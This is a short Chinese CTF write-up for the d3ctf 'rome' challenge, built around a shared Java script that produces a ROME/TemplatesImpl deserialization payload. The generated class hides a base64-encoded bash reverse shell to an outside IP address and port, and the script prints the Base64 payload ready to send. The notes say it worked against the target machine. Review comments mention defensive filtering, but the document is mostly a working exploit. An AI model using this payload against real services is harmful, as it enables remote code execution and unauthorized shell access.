d3ctf·rome
如果想转Base64加上这个就好
// Serialize `map` with Java native serialization and print it as a single Base64 line.
ByteArrayOutputStream buffer = new ByteArrayOutputStream();
try (ObjectOutputStream out = new ObjectOutputStream(buffer)) {
    out.writeObject(map);
}
// Base64 output is pure ASCII, so the default-charset String constructor is safe here.
System.out.println(new String(Base64.getEncoder().encode(buffer.toByteArray())));
注意版本
分享一下miku师傅的脚本
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ToStringBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Hashtable;

// Payload generator for the ROME deserialization chain as wired below:
//   HashMap key -> EqualsBean -> ToStringBean -> TemplatesImpl (Javassist-built bytecode).
// main() prints the serialized HashMap as Base64 and then reads it back locally.
// NOTE(review): a stream containing TemplatesImpl together with the ROME beans is the
// shape a JEP 290 ObjectInputFilter / class allow-list on the receiving side is meant to
// reject; it is also a useful indicator when reviewing captured serialized data.
public class miku {
    // Reflectively writes a field (private fields included) that has no public setter.
    // obj: target instance; fieldname: a field declared on obj's concrete class (not an
    // inherited one); value: the new value. Propagates NoSuchFieldException and friends.
    public static void setFieldValue(Object obj,String fieldname,Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldname);
        field.setAccessible(true);
        field.set(obj,value);
    }

    // Builds, with Javassist, a class named "Evil" that extends AbstractTranslet and whose
    // static initializer runs a base64-encoded command through bash, then returns its bytecode.
    // NOTE(review): on any failure the exception is only printed and an EMPTY array is
    // returned, so a broken payload is produced silently — check stderr if the chain does nothing.
    public static byte[] getTemplatesImpl() {
        try {
            ClassPool pool = ClassPool.getDefault();
            CtClass ctClass = pool.makeClass("Evil");
            // Presumably required because TemplatesImpl instantiates the loaded class as a
            // translet — confirm against the target JDK's TemplatesImpl.
            CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
            ctClass.setSuperclass(superClass);
            // Code in the static initializer runs as soon as the class is initialized; the
            // command is kept base64-encoded inside the generated source and decoded at run time.
            CtConstructor constructor = ctClass.makeClassInitializer();
            constructor.setBody(" try {\n"
                    + " Runtime.getRuntime().exec("
                    + "new String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjEyOS40Mi4xNDAvMzMwNyAwPiYx}|{base64,-d}|{bash,-i}\"}"
                    + ");\n"
                    + " } catch (Exception ignored) {\n"
                    + " }");
            byte[] bytes = ctClass.toBytecode();
            // toBytecode() freezes the CtClass; defrost so the pooled definition stays editable.
            ctClass.defrost();
            return bytes;
        } catch (Exception e) {
            e.printStackTrace();
            return new byte[]{};
        }
    }

    public static void main(String[] args) throws Exception{
        // TemplatesImpl loads the bytecode dynamically
        byte[] code = getTemplatesImpl();
        TemplatesImpl obj = new TemplatesImpl();
        // Any non-null name; presumably required by TemplatesImpl — confirm on the target JDK.
        setFieldValue(obj,"_name","jiang");
        // No cached class, so the bytecode set below is what gets defined — presumably.
        setFieldValue(obj,"_class",null);
        // setFieldValue(obj,"_tfactory",new TransformerFactoryImpl());
        setFieldValue(obj,"_bytecodes",new byte[][]{code});
        // A placeholder TemplatesImpl is wrapped first; the real one is injected into _obj only
        // after map.put below, presumably so that hashing the key during put does not fire the
        // chain in this process (see the commented-out trigger calls).
        ToStringBean toStringBean = new ToStringBean(Templates.class, new TemplatesImpl());
        //toStringBean.toString();
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
        //equalsBean.hashCode();
        HashMap<Object, Object> map = new HashMap<>();
        // The map value is irrelevant; the key is the gadget.
        map.put(equalsBean, "bbb");
        setFieldValue(toStringBean, "_obj", obj);
        // Serialize
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(map);
        oos.close();
        String payload = new String(Base64.getEncoder().encode(baos.toByteArray()));
        System.out.println(payload);
        // Deserialize — local round trip. Presumably this runs the chain on the generating
        // machine itself (the surrounding notes say it was tested locally first).
        ByteArrayInputStream bais = new ByteArrayInputStream(baos.toByteArray());
        ObjectInputStream ois = new ObjectInputStream(bais);
        ois.readObject();
        ois.close();
    }
}
其实直接用我rome链那篇笔记的也可以
calc换成反弹shell命令就可以了,本地测试有效
测试了一下靶机，不行，可能是版本问题，换成 miku 师傅的脚本就可以了，记录一下